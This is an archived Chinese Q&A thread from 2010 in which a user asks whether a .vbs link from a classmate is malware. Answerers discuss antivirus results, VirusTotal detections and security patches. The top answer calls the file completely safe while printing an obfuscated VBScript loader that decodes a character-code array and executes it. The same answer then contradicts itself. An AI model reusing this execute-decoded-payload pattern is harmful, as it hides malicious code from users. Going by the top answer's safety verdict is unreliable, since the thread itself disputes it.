想請大家幫我看一下這個網址有沒有毒

💻 軟件台 軟體
2010-07-06 12:53 am
http://www.toktokenglish.com/inc/play.vbs

這是我一個同學用即時通傳來的網址

好像是宣傳自己的東西

可是這是文件欸
副檔名又怪怪的
很想知道裡面是什麼
可是怕有毒= =
所以想麻煩家裡防毒強的幫我看一下

謝謝^^

!!!!!防毒不夠強不要亂試,如果真的有毒不要找我!!!!!!
更新1:

痾...我是有點過啦~礙於好奇心嘛= = 可是我點進去他是一個下載檔 我覺得怪怪的所以沒下載給他按取消 這樣應該不致於有事吧? --- 還有大家加為什麼不用回答呢? 我覺得這也算是解答阿~

回答 (5)

2010-07-06 7:59 am
✔ 最佳答案
我下載試了一下

這檔案不是病毒

請版大放100%心

我分析了一下

發現它裡面都是一些數據和英文字

我拿後小段給你看一下

104,103,41,37,34,13,10,71,89,85,102,116,117,102,84,89,32,61,32,82,101,112,108,97,99,101,40,71,89,85,102,116,117,102,84,89,44,32,34,37,44,40,109,104,103,41,38,34,44,99,104,114,40,57,41,41,13,10,71,89,85,102,116,117,102,84,89,32,61,32,82,101,112,108,97,99,101,40,71,89,85,102,116,117,102,84,89,44,32,34,-12624,34,44,32,99,104,114,40,51,52,41,41,13,10,71,89,85,102,116,117,102,84,89,32,61,32,82,101,112,108,97,99,101,40,71,89,85,102,116,117,102,84,89,44,32,34,-14418,34,44,32,99,104,114,40,51,57,41,41,13,10,101,120,101,99,117,116,101,40,77,121,69,110,99,111,100,101,40,71,89,85,102,116,117,102,84,89,41,41,13,10,102,117,110,99,116,105,111,110,32,77,121,69,110,99,111,100,101,40,104,97,99,107,53,50,48,111,114,103,41,13,10,115,122,32,61,32,83,112,108,105,116,40,104,97,99,107,53,50,48,111,114,103,44,32,34,38,44,40,109,104,103,41,37,34,41,13,10,70,111,114,32,105,32,61,32,85,66,111,117,110,100,40,115,122,41,32,84,111,32,48,32,83,116,101,112,32,45,49,13,10,119,101,105,119,101,105,32,61,32,119,101,105,119,101,105,32,43,32,115,122,40,105,41,32,43,32,118,98,99,114,108,102,13,10,78,101,120,116,13,10,77,121,69,110,99,111,100,101,61,119,101,105,119,101,105,13,10,101,110,100,32,102,117,110,99,116,105,111,110"
Function ChrData(Data)
MyArray = Split(Data, ",", -1, 1)
For each OldData in MyArray
Newdata=NewData&chr(OldData)
Next
ChrData=NewData
End function
execute Chrdata(data)

2010-07-06 00:00:54 補充:
可能只是破壞電腦裡面的一些正常數據
讓電腦出一些小問題而已
👍 0 👎 0
2010-07-06 5:46 pm
http://www.virustotal.com/zh-tw/
檔案上傳到這邊做分析
有三個判為病毒

我自己電腦實驗 防毒軟體是江民防毒
檔案下載沒事 雙擊後 查殺到網頁病毒

給你參考
基本上 若是你朋友從即時通傳來 傳後又置之不理
你回問他 也沒回 或是就馬上離線
這種都幾乎是他電腦被病毒感染發送所有朋友列訊息的
可以這樣簡單判斷
參考: 自己 網路
👍 0 👎 0
2010-07-06 5:41 am
版大大概有也重這病毒了吧?(有進去的話AA)
👍 0 👎 0
2010-07-06 5:04 am
簡單來說:

*這是一個病毒網頁

意義要讓其他人一起中獎。
點進去將會得到 頭獎:[麻煩]

*相對著你的同學已經中獎了。

小弟的意見大致上與樓上相同。
👍 0 👎 0
2010-07-06 1:47 am
依檔名來看,就知一種惡意詞法的VBS的病毒。

請依作業系統和使用IE的版本,去微軟的下載中心,下載KB981349的VBScript (5.6或5.7或5.8) 安全性更新,回來安裝以避免被利用此一漏洞造成攻擊或中毒。
PS.必要時也請將Jscript 5.8、ActiveX Killbits 這類的安全性更新,都下載回來安裝。
PS1.嫌煩麻的話,請利用自動更新,或Windows Update。幫您檢杳和安裝。
PS2.同時也請您同學的電腦去掃毒。

2010-07-06 01:24:07 補充:
已將play.vbs提交給Microsoft Security Essentials做病毒分析了。
可能1-2天就知道結果了。

2010-07-06 01:24:16 補充:
2010/5/9 提交過waigua_2_850883.exe這個外掛,原先Security Essentials和avast!5.0防毒都沒偵測出病毒,現已證實為Trojan:Win32/Startpage.AEF (網頁首頁的綁病毒了)
它就是淘寶網(杬惘厙)綁架IE首頁的病毒之一,此綁架手法會修改登錄值的使用權限外,同時也會刧持[搜尋]的[搜尋結果]並連結到hxxp://bg.go4321.com/。

2010/06/01提交的_lnk.zip (-ñk¿α¼_ñ_.lnk )→證實並列為TrojanDownloader:BAT/Lnkget.AG 病毒。

2010-07-06 07:30:21 補充:
Microsoft Security Essentials防毒分析結果,已回覆play.vbs不是惡意檔案。
👍 0 👎 0


收錄日期: 2021-04-24 10:35:51
原文連結 [永久失效]:
https://hk.answers.yahoo.com/question/index?qid=20100705000016KK06410

檢視 Wayback Machine 備份

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Ans.fyi 參考答案 - 知識平台 © 2024 條款免責 私穩政策